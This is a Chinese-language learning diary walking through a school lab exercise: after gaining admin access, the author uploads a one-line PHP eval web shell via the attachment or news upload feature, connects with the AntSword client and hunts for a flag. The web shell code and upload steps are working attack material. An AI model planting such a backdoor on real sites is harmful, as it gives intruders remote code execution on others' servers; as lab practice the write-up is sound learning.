学习的第四天
四、获取管理员权限后,如何得到flag
注1:本篇中的注入内容是学校的靶机,并没有干什么坏事哦!
注2:已完成前一天的学习,且安装过蚁剑(antsword)为前提。
1、上传后门
第一步,写一个可用作后门的php文件,并上传至靶机。
- 因为我们已经取得了管理员的权限,所以我们可以随意的上传一些文件,当然也包括一些不太安全的文件。
- 首先我们写一个做简单的后门php,先新建一个空记事本,输入代码
<?php @eval($_POST['shell']);?>,再将文件命名为webshell,且后缀名改为php。 - 我们直接进入管理员后台,选择附件管理项,进行上传附件。
- 选择我们刚刚新建的 php文件,上传。
第二步,找寻上传文件地址,通过蚁剑连接网站,进入网站目录,找寻flag。
- 然后我们回到前端,找到我们之前上传的文件,进入。
- 这样我们就得到了我们上传文件的地址,再打开蚁剑,进行与网站之间的交互。
- 打开蚁剑,选择空白处右键选择添加数据,输入我们得到的文件网址,密码为shell,添加。
- OK,这样我们就成功进入了网站的目录了,接下来我们就要开始找flag了!
- 这一步就没什么方法,排除一些一看就是系统自带的文件夹,剩下的就只能一个一个打开找了,对,就嗯找。
- 经过时间的考验,我们终于得到了flag,可以去提交任务了。
第1.5步,另一种上传文件,找寻文件地址的方法。
- 其实上传文件的方法和找寻文件的方法远不止一种,这里再分享一个稍微简单一点的方法。
- 首先我们还是先进入管理员后台界面,选择新闻管理项,添加新闻。
- 编写一个标题,选择一个分类,上传我们的php文件,再随便写点内容,提交。
- 上传成功后,再返回新闻管理,我们可以看到,我们新添加的新闻,选择修改。
- 进入修改界面后,似乎没有看到我们刚上传的文件,但实际上,他以图片形式展示了,让我们复制图片地址。
- 这样也打开了我们文件的网站地址。